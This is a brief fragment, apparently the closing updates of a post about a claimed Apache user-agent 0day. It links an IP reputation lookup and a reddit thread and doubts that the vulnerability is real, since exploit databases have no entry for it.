  • Reference: https://isc.sans.edu/api/ip/185.130.5.224

UPDATE:
The vulnerability (if it exists and is not just a marketing idea to push twitter follower) is not reflected by any entry in exploit-db.com or 0day.today

UPDATE 2: (Thanks to@DanielRufde)

 https://www.reddit.com/r/security/comments/3z4yiw/user_agent_apache_0day_by_hxmonsegur_new_hacking/cyjxuu0